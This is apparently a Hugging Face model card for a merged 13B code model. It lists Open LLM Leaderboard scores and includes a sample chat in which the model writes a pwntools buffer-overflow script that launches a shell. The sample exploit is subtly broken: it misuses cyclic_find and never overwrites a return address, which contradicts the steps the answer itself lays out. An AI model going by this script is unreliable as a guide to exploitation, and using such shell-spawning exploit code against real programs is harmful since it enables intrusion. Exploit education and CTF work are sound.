lodrick-the-lafted's picture
Update README.md
7fd0602 verified
---
license: llama2
tags:
- moe
- merge
base_model: codellama/CodeLlama-13b-Instruct-hf
model-index:
- name: Winged-Lagomorph-2x13B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: AI2 Reasoning Challenge (25-Shot)
type: ai2_arc
config: ARC-Challenge
split: test
args:
num_few_shot: 25
metrics:
- type: acc_norm
value: 47.95
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: HellaSwag (10-Shot)
type: hellaswag
split: validation
args:
num_few_shot: 10
metrics:
- type: acc_norm
value: 69.39
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU (5-Shot)
type: cais/mmlu
config: all
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 44.5
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: TruthfulQA (0-shot)
type: truthful_qa
config: multiple_choice
split: validation
args:
num_few_shot: 0
metrics:
- type: mc2
value: 44.54
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: Winogrande (5-shot)
type: winogrande
config: winogrande_xl
split: validation
args:
num_few_shot: 5
metrics:
- type: acc
value: 67.4
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GSM8k (5-shot)
type: gsm8k
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 25.63
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
---
Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit. Use the WhiteRabbitNeo template for regular code, and the NR template for function calling.
<img src=https://huggingface.co/lodrick-the-lafted/Winged-Lagomorph-2x13B/resolve/main/winged-lago.png>
SYSTEM: Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
USER: Write a pwntools script that overflows a 64 character buffer from stdin.
ASSISTANT: To write a pwntools script that overflows a 64-character buffer from stdin, we need to follow these steps:
1. **Identify the vulnerable program**: Find the program that has a buffer overflow vulnerability. This can be done by analyzing the program's source code or by using tools like `gdb` or `valgrind`.
2. **Set up the environment**: Install pwntools and any other necessary dependencies.
3. **Create a pwntools script**: Start by importing the `pwn` module and setting up the connection to the vulnerable program.
4. **Find the offset**: Use the `cyclic` function from pwntools to generate a pattern that will help us find the offset.
5. **Overflow the buffer**: Send the generated pattern to the vulnerable program, and then send additional data to overwrite the return address on the stack.
6. **Control the execution flow**: Overwrite the return address with the address of a shellcode or a function that will give us a shell.
7. **Execute the script**: Run the script and observe the results.
Here's an example pwntools script that overflows a 64-character buffer:
```python
from pwn import *
# Set up the connection to the vulnerable program
p = process('./vulnerable_program')
# Find the offset using cyclic
offset = cyclic_find(b'A'*64)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Overflow the buffer
payload = b'A' * offset + shellcode
p.sendline(payload)
# Execute the script
p.interactive()
```
In this example, `vulnerable_program` is the name of the vulnerable program, and `shellcraft.sh()` is a function from pwntools that generates shellcode for a Linux/x86-64 system. The `cyclic_find` function is used to find the offset at which the buffer overflow occurs.
Please note that this script is a basic example and may not work in all cases. It's important to tailor the script to the specific vulnerability and environment you are working with.
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_lodrick-the-lafted__Winged-Lagomorph-2x13B)
| Metric |Value|
|---------------------------------|----:|
|Avg. |49.90|
|AI2 Reasoning Challenge (25-Shot)|47.95|
|HellaSwag (10-Shot) |69.39|
|MMLU (5-Shot) |44.50|
|TruthfulQA (0-shot) |44.54|
|Winogrande (5-shot) |67.40|
|GSM8k (5-shot) |25.63|